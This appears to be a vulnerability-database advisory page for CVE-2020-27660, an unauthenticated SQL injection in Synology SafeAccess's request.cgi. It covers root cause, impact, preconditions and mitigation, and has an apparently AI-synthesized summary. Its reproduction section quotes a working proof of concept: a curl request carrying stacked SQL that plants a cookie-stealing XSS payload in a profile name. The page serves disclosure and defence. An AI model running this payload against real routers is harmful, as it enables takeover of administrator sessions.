CVE-2020-27660
Description
SQL injection vulnerability in request.cgi in Synology SafeAccess before 1.2.3-0234 allows remote attackers to execute arbitrary SQL commands via the domain parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SQL injection in Synology SafeAccess request.cgi allows remote attackers to execute arbitrary SQL commands via the domain parameter.
Vulnerability
SQL injection vulnerability exists in the request.cgi binary of Synology SafeAccess before version 1.2.3-0234 [3]. The domain parameter is not sanitized before being used in an SQLite query, allowing an attacker to inject arbitrary SQL commands [2]. The vulnerable code path is triggered when a user on a network with an active SafeAccess profile sends a request to access a blocked domain via the blocking page [1][2].
Exploitation
An attacker on the local network can send a crafted HTTP GET request to /cgi/request.cgi with a malicious domain parameter containing SQL injection payloads [2]. No authentication is required, and no user interaction is needed [3]. The request is logged into the SQLite database, and the injected SQL commands are executed [1]. For example, the attacker can modify the fbsharing.db database to expose internal directories [1].
Impact
Successful exploitation allows an attacker to execute arbitrary SQL commands on the SQLite database used by SafeAccess [2]. This can lead to disclosure of sensitive information, modification of database contents, and potentially remote code execution [2]. The attacker could, for instance, alter the file sharing database to gain access to all files accessible through File Station [1]. The CVSSv3 score is 9.6 (Critical) with a vector of AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H [3].
Mitigation
Synology has released SafeAccess version 1.2.3-0234 to fix this vulnerability [3]. Users should upgrade to this version or later. No workarounds are available [3]. The vulnerability was disclosed in Synology-SA-20:25 [1][3].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2<1.2.3-0234+ 1 more
- (no CPE)range: <1.2.3-0234
- (no CPE)range: unspecified
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization in the `domain` parameter allows SQL injection via unsanitized string interpolation in a SQLite INSERT query."
Attack vector
An attacker on the local network sends a crafted HTTP GET request to `/cgi/request.cgi` with a malicious `domain` parameter containing SQL metacharacters [ref_id=1]. The `domain` value is passed unsanitized into a SQLite INSERT query, enabling stacked SQL injection [ref_id=1]. Because the httpd server runs as root, the attacker can leverage the injection to execute arbitrary code or, as demonstrated in the PoC, attach to another database and inject an XSS payload into profile names to steal administrator session cookies [ref_id=1]. No authentication is required; the attacker only needs network access to the router's web interface [ref_id=1].
Affected code
The vulnerability resides in the `syno::safeaccess::insert` function within `libsynosafeaccesslog.so`. The function builds a SQL INSERT query using a format string where the `text` parameter (derived from the HTTP `domain` parameter) is wrapped in single quotes but never escaped or sanitized before being passed to `SQLite::Database::exec` [ref_id=1]. The entry point is `request.cgi`, which handles the unauthenticated GET request to `/cgi/request.cgi` [ref_id=1].
What the fix does
The advisory does not include a patch diff, but the remediation is to upgrade SafeAccess to version 1.2.3-0234 or later [ref_id=1]. The fix presumably adds proper escaping or parameterized queries for the `domain` value before it is inserted into the SQL statement, preventing the injection of arbitrary SQL commands [ref_id=1]. No further technical details about the fix are provided in the available references.
Preconditions
- networkAttacker must have network access to the Synology router's web interface (adjacent network, CVSS:3.0/AV:A)
- configSafeAccess package must be installed and enabled on the Synology SRM device
- authNo authentication required; the request.cgi endpoint is accessible without credentials
- inputAttacker sends a crafted domain parameter in the HTTP GET request
Reproduction
The following proof-of-concept is reproduced from the Talos advisory [ref_id=1]:
``` $ sql='commit;'\ 'attach database "/usr/syno/etc/packages/SafeAccess/synoaccesscontrol/database.db" as x;'\ 'update x.profile set name="user<img src=/ onerror=""alert(document.cookie)""/>" where id=3;' $ curl "http://10.254.1.2/cgi/request.cgi?domain=%27);"$(echo "$sql" | sed "s/ /%20/g")"--" ```
This injects stacked SQL queries via the `domain` parameter to attach a second database and modify a profile name with an XSS payload. When an administrator views the SafeAccess logs or profiles, the JavaScript executes, allowing session cookie theft [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2- www.synology.com/security/advisory/Synology_SA_20_25mitrex_refsource_CONFIRM
- www.talosintelligence.com/vulnerability_reports/TALOS-2020-1087mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.